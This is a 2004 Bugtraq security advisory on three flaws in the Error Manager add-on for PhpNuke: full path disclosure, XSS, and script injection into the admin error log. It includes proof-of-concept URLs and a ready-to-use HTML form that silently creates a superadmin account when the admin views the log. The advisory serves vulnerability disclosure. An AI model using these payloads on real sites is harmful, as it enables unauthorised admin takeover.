[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-03-18 17:02:29
Message-ID: 20040318170229.17259.qmail () search ! securityfocus ! com
[Download RAW message or body]
{================================================================================}
{ [waraxe-2004-SA#010] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ] }
{ }
{================================================================================}
\
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's readme file:
This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure
Let's look at original code:
//language
if( isset( $newlang ) ) {
include( "language/error/lang-$newlang.php" );
$language = $newlang;
} elseif ( isset( $lang ) ) {
include( "language/error/lang-$lang.php" );
$language = $lang;
} else {
include( "language/error/lang-$language.php" );
}
So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:
http://localhost/nuke71/error.php?newlang=foobar
Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or \
directory in D:\apache_wwwroot\nuke71\error.php on line 19
2. Cross-Site Scripting aka XSS
Again, let's look at original code:
if ($error == 401) {
$pagetitle = "- "._EM401."";
}
if ($error == 403) {
$pagetitle = "- "._EM403."";
}
if ($error == 404) {
$pagetitle = "- "._EM404."";
}
if ($error == 500) {
$pagetitle = "- "._EM500."";
}
This is traditionally coded by using the "switch/case" language constructions, but
for some reason the author uses there "if/if/if/..." construction, not even \
"if/elseif/elseif/else". And we can see, that if variable $error is not the 401, 403, \
404 or 500, but something else, then we can UNINITIALIZED $pagetitle set to any \
value. This will lead of course to XSS conditions:
http://localhost/nuke71/error.php?pagetitle=[xss code here]
One more way to XSS exploiting:
http://localhost/nuke71/error.php?error=>[xss code here]
As with all the PhpNuke XSS cases, using of the POST parameters or even better - \
COOKIE parameters - will be preffered, because the GET parameters are strictly \
filtered in mainfile.php .
3. Script injection to error log (nasty one!)
This one is my favourite bug. I mean - Error Manager is suppose to log the error \
conditions in web server and therefore admin can find potential bugs on site and of \
course this logging feature will reveale to admin many (unsuccessful) attacks by "bad \
guys". It's shame, but it's true - error logging in Error Manager will log referer, \
request URI , etc, but WITHOUT ANY sanityze against html tags ;) So we can inject any \
javascript code to error log and when admin will browse the logs, the website can be \
compromised - for example cookies can be stealed, additional superadmin accounts can \
be created without the knowledge of the admin (refference to [waraxe-2004-SA#008 - \
easy way to get superadmin rights in PhpNuke 6.x-7.1.0]) etc ...
So, there is an attack scenario:
Write the html file like this one -
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.victim.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0' \
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
</center>
<br><br><br>
</BODY>
</HTML>
Use it aginst victim server and then just wait, till admin reads the error log and \
then login to your brand new superadmin account ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum staff and to all IT security related people in Estonia! \
Tervitused! Special greets to ulljobu!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic